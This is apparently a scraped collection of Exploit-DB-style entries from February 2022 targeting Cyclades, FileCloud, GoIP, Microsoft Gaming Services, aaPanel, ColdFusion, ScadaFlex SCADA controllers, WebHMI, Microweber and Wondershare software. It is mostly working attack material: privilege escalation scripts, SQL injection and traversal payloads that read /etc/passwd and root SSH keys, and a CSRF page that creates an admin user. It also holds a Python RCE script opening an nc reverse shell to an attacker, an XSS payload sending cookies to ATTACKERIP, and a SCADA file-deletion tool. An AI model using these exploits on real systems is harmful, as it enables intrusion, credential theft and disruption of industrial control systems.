ISHACK AI BOT

# Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation # Date: 09 Feb 2022 # Exploit Author: @ibby # Vendor Homepage: https://www.vertiv.com/en-us/ # Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip # Version: Legacy Versions V_1.0.0 to V_3.3.0-16 # Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16) # CVE : N/A # The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges ## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014. ### This vulnerability does not exist in the newer distributions of the ACS Software. #!/bin/bash ## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system. ## The software is publicly available, this will grab it and unpack the firmware for you. #TMPDIR=$(mktemp -d) #curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin #sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers" #echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky." # ! EXPLOIT CODE BELOW ! # # ------- # Once you exit the root shell, this will clean up and put the binaries back where they belong. echo "Creating backups of sed & bash binaries" sudo cp /bin/sed /bin/sed.bak sudo cp /bin/bash /bin/bash.bak echo "Saved as bash.bak & sed.bak" sudo mv /bin/bash /bin/sed sudo /bin/sed echo "Replacing our binary with the proper one" sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed

# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF) # Date: 2022-02-20 # Exploit Author: Masashi Fujiwara # Vendor Homepage: https://www.filecloud.com/ # Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2 # Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447) # Tested on: # OS: Ubuntu 18.04.6 LTS (Docker) # Apache: 2.4.52 # FileCloud: 21.2.4.17315 # CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation) # Conditions 1. Only vulnerable if cookies have samesite set to None (SameSite=None). echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php 2. Use https as target url (When cookies set SameSite=None, also set Secure). # PoC (HTML) <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <script> function init(){ myFormData = new FormData(); let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'}); myFormData.append("uploadFormElement", fileContent, "user.csv"); fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"}); } </script> </head> <body onload="init()"> CSRF PoC for CVE-2022-25241 Creat hacker user with Password1 via CSV file upload. </body> </html> # HTTPS Request POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1 Host: 192.168.159.129:8443 Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493 Content-Length: 365 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW Connection: close ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv" Content-Type: application/vnd.ms-excel UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW-- # CSV file format UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES

# Exploit Title: Dbltek GoIP - Local File Inclusion # Date: 20.02.2022 # Exploit Author: Valtteri Lehtinen & Lassi Korhonen # Vendor Homepage: http://en.dbltek.com/index.html # Software Link: - # Version: GHSFVT-1.1-67-5 (firmware version) # Tested on: Target is an IoT device # Exploit summary Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP. The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities. Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up. It is probable that also other models and versions of Dbltek GoIP devices are affected. Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ # Proof of Concept Assuming the device is available on IP 192.168.9.1. Download /etc/passwd http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up) http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat

# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path # Discovery by: Johto Robbie # Discovery Date: May 12, 2021 # Tested Version: 2.52.13001.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 Home # Step to discover Unquoted Service Path: Go to Start and type cmd. Enter the following command and press Enter: C:\Users\Bang's>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """ Gaming Services GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto Gaming Services GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto C:\Users\Bang's>sc qc "GamingServices" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GamingServices TYPE : 210 WIN32_PACKAGED_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Gaming Services DEPENDENCIES : staterepository SERVICE_START_NAME : LocalSystem This application have no quote . And it contained in C:\Program Files. Put mot malicious aplication with name "progarm.exe" Stop & Start: GamingServices. "progarm.exe" will be execute #Exploit: An unquoted service path in Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to privilege escalation during the installation process that is performed when an executable file is registered. This could further lead to complete compromise of confidentiality, Integrity and Availability. #Timeline May 12, 2021 - Reported to Microsoft Feb 11, 2022 - Confirmed vulnerability has been fixed

# Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection # Date: 22/02/2022 # Exploit Author: Mosaaed # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux # Sqlmap command: sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

# Title: Air Cargo Management System v1.0 - SQLi # Author: nu11secur1ty # Date: 02.18.2022 # Vendor: https://www.sourcecodester.com/users/tips23 # Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System # Description: The `ref_code` parameter from Air Cargo Management System v1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+' was submitted in the ref_code parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. WARNING: If this is in some external domain, or some subdomain redirection, or internal whatever, this will be extremely dangerous! Status: CRITICAL [+] Payloads: --- Parameter: ref_code (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=trace&ref_code=258044'+(select load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'' AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki ---

# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.aapanel.com/ # Software Link: https://www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa) #Go to App Store #Click to "install" in any free plugin. #Change installation script to ../../../root/.ssh/id_rsa POST /ajax?action=get_lines HTTP/1.1 Host: IP:7800 Content-Length: 41 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://IP:7800 Referer: http://IP:7800/soft Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0; request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd; serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13; page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot; distribution=ubuntu; serial_no=; pro_end=-1; load_page=null; load_type=null; load_search=undefined; force=0; rank=list; Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/; path_dir_change=/www/wwwroot/ Connection: close num=10&filename=../../../root/.ssh/id_rsa

# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) # Google Dork: intext:"adobe coldfusion 11" # Date: 2022-22-02 # Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb) # Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html # Version: Adobe Coldfusion (11.0.03.292866) # Tested on: Microsoft Windows Server & Linux # Description: # ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution. # JNDI attack via the 'verifyldapserver' parameter on the utils.cfc ==================== 1.Setup rogue-jndi Server ==================== https://github.com/veracode-research/rogue-jndi ==================== 2.Preparing the Attack ======================= java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box" ==================== 3.Launch the Attack ========================== http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json curl -i -s -k -X $'GET' \ -H $'Host: target' \ --data-binary $'\x0d\x0a\x0d\x0a' \ $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json' ==================== 4.RCE ======================================= Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8 Can be done by modify the pom.xml as below <configuration> <source>7</source> <target>7</target> </configuration>

# Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated) # Exploit Author: Mohd. Anees # Contact: https://www.linkedin.com/in/aneessecure/ # Software Homepage: https://phpgurukul.com/student-record-system-php/ # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 22.02.2022 ######## Description ######## # # # Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work # # http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1 Host: localhost sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt Connection: close

# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # # # Vendor: Industrial Control Links, Inc. # Product web page: http://www.iclinks.com # Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf # Affected version: SW: 1.03.07 (build 317), WebLib: 1.24 # SW: 1.02.20 (build 286), WebLib: 1.24 # SW: 1.02.15 (build 286), WebLib: 1.22 # SW: 1.02.01 (build 229), WebLib: 1.16 # SW: 1.01.14 (build 172), WebLib: 1.14 # SW: 1.01.01 (build 2149), WebLib: 1.13 # # # Summary: Scadaflex II controllers are 100% web based # for both configuration and user interface. No applications # are required other than any standard web browser. They # are easily supported by remote access over the Internet # or a cellular link. Scadaflex II controllers support # industry standard wired communications using Modbus, # DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial # bridging for Modbus or any other protocol. Each Scadaflex # II controller has both analog and digital, inputs and # outputs, sufficient for pumping stations, irrigation # controls, and other similar process monitoring and control # applications. They can also serve as communications # concentrators and protocol converters that enhance the # operation of existing PLCs and process equipment. # # Desc: The SCADA controller is vulnerable to unauthenticated # file write/overwrite and delete vulnerability. This allows # an attacker to execute critical file CRUD operations on the # device that can potentially allow system access and impact # availability. # # Tested on: SCADA HTTP Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5698 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php # # CVE ID: CVE-2022-25359 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359 # # # 06.11.2021 # import time,sys import requests import datetime import showtime # Default # AES Encryption Key = 'ABCD1234abcd:ICL' def bann(): print(''' ---------------------------------------------------------- ) ) ) ) ) ) ( ( ( ( ( ( ) ) ) ) ) ) (~~~~~~~~~) (~~~~~~~~~) | t00t | | w00t | | | | | I _._ I _._ I /' `\\ I /' `\\ I | M | I | J | f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~| .' | ||~~~~~~~~| | .' | | |~~~~~~~~| | /'______|___||__###___|____|/'_______|____|_|__###___|___| ScadaFlex II SCADA Controllers Remote write/delete PoC ZSL-2022-5698 ---------------------------------------------------------- ''') def safe(*trigger, ): return True # |-| Safety Switch def choice(n): try: if n == 1: overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10)) elif n == 2: delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10)) else: print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]') print('Usage (Delete): ./sflex.py [IP] [File position number]') raise SystemExit('t00t') except Exception as tip: raise SystemExit(tip) def jump(): choice(1) if len(sys.argv) == 4 else next choice(2) if len(sys.argv) == 3 else next def overwrite(controllerip, filepos): print('Starting script at', start) localfile = sys.argv[2] with open(localfile, 'rb') as opener: scadaurl = 'http://' scadaurl += controllerip scadaurl += '/d.php?N' scadaurl += str(filepos) scadaurl += ',73,' scadaurl += opener.name scadaurl += '~' scadaurl += str(int(time.time())) see = requests.post(scadaurl, files = {'upload' : opener}) if '100' in see.text: print('File uploaded in {} directory at position {}.'.format('l', filepos)) print('URL: http://' +controllerip+ '/l/' +localfile) else: print("- controller webserver error.") exit() def delete(controllerip, filepos): print('Starting script at', start) exit(42) if isinstance(filepos, str) else next scadaurl = 'http://' scadaurl += controllerip scadaurl += '/rW12IcL_Dat_N' scadaurl += str(filepos) scadaurl += ',0=1~' scadaurl += str(int(time.time())) see = requests.get(scadaurl) check = '\x72\x57' #| check += '\x31\x32' #| check += '\x49\x63' #| check += '\x4c\x5f' #| check += '\x44\x61' #| check += '\x74\x5f' #| check += '\x4e'# o' #| check += str(filepos)#| check += '\x2c\x30' #| check += '\x09\x52' #| if check in see.text: print('File at position {} deleted.'.format(filepos)) else: print('- controller webserver error.') exit() def main(): if safe(True): print('Careful...\nSafety: ON') exit(17) else: print('Safety: OFF', end = '') global start start = datetime.datetime.now() start = start.strftime('%d.%m.%Y %H:%M:%S') bann(), jump(), choice(1959) if __name__ == "__main__": main()

# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 03/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI 4.1.1.7662 # Tested on: WebHMI-4.1.1.7662 #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") print("Level2 account must be enabled !\n"); login = "admin" password = "admin" class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" payload = "<?php+system($_GET['c']);+?>" headers_login = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Bypassing basedir...') for i in range(0, len(payload)): #print(payload[i]) rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies) time.sleep(0.2) print('[*] Setting up listener...') listener = subprocess.Popen(["nc", "-nlp", self.localport]) time.sleep(2) print('[*] Executing payload...') time.sleep(1) print('[*] Waiting reverse shell...') r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies) if (r4.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()

# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 04/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware 4.1.1.7662 # Tested on: WebHMI Firmware 4.1.1.7662 #Steps to Reproduce 1. Login to admin account 2. Add a new register or create new dashboard insert payload <script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script> in Title field and save. # Dashboard section impact instantly all logged users. #Listener log: GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1 Host: 192.168.0.169:8080 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-GPC: 1 Referer: http://192.168.0.153/ Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7

# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated) # Date: 22.02.2022 # Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com> # Vendor Homepage: https://microweber.org/ # Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip # Version: Microweber CMS v1.2.10 # Tested on: Microweber CMS v1.2.10 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)', 'Description' => %q{ Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem. Upload function may delete the local file if the web service user has access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Talha Karakumru <talhakarakumru[at]gmail.com>' ], 'References' => [ ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/'] ], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ OS_RESOURCE_LOSS ] }, 'Targets' => [ [ 'Microweber v1.2.10', {} ] ], 'Privileged' => true, 'DisclosureDate' => '2022-01-30' ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']), OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']), OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']), OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']), OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'login') }) if res.nil? fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.') end print_status 'Checking if it\'s Microweber CMS.' if res.code == 200 && !res.body.include?('Microweber') print_error 'Microweber CMS has not been detected.' Exploit::CheckCode::Safe end if res.code != 200 fail_with(Failure::Unknown, res.body) end print_good 'Microweber CMS has been detected.' return check_version(res.body) end def check_version(res_body) print_status 'Checking Microweber\'s version.' begin major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.') version = Rex::Version.new("#{major}.#{minor}.#{build}") rescue NoMethodError, TypeError return Exploit::CheckCode::Safe end if version == Rex::Version.new('1.2.10') print_good 'Microweber version ' + version.to_s return Exploit::CheckCode::Appears end print_error 'Microweber version ' + version.to_s if version < Rex::Version.new('1.2.10') print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.' return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def try_login print_status 'Trying to log in.' res = send_request_cgi({ 'method' => 'POST', 'keep_cookies' => true, 'uri' => normalize_uri(target_uri.path, 'api', 'user_login'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'lang' => '', 'where_to' => 'admin_content' } }) if res.nil? fail_with(Failure::Unreachable, 'Log in request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end json_res = res.get_json_document if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.' fail_with(Failure::BadConfig, 'Wrong username or password.') end if !json_res['success'].nil? && json_res['success'] == 'You are logged in' print_good 'You are logged in.' return end fail_with(Failure::Unknown, 'An unknown error occurred.') end def try_upload print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'), 'vars_get' => { 'src' => datastore['LOCAL_FILE_PATH'] }, 'headers' => { 'Referer' => referer } }) if res.nil? fail_with(Failure::Unreachable, 'Upload request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['success'] print_good json_res['success'] return end fail_with(Failure::Unknown, res.body) end fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.') end def try_download filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1] print_status 'Downloading ' + filename + ' from the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'), 'vars_get' => { 'filename' => filename }, 'headers' => { 'Referer' => referer } }) if res.nil? fail_with(Failure::Unreachable, 'Download request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['error'] fail_with(Failure::Unknown, json_res['error']) return end end print_status res.body end def run if datastore['DEFANGED_MODE'] warning = <<~EOF Triggering this vulnerability may delete the local file if the web service user has the permission. If you want to continue, disable the DEFANGED_MODE. => set DEFANGED_MODE false EOF fail_with(Failure::BadConfig, warning) end try_login try_upload try_download end end

# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions # Discovery by: Luis Martinez # Discovery Date: 2022-02-23 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/mirror_go_full8050.exe # Tested Version: 2.0.11.346 # Vulnerability Type: Local Privilege Escalation # Tested on OS: Windows 10 Pro x64 es # Step to discover Privilege Escalation: # Insecure folders permissions issue: C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe" C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F) # Service info: C:\>sc qc ElevationService [SC] QueryServiceConfig SUCCESS 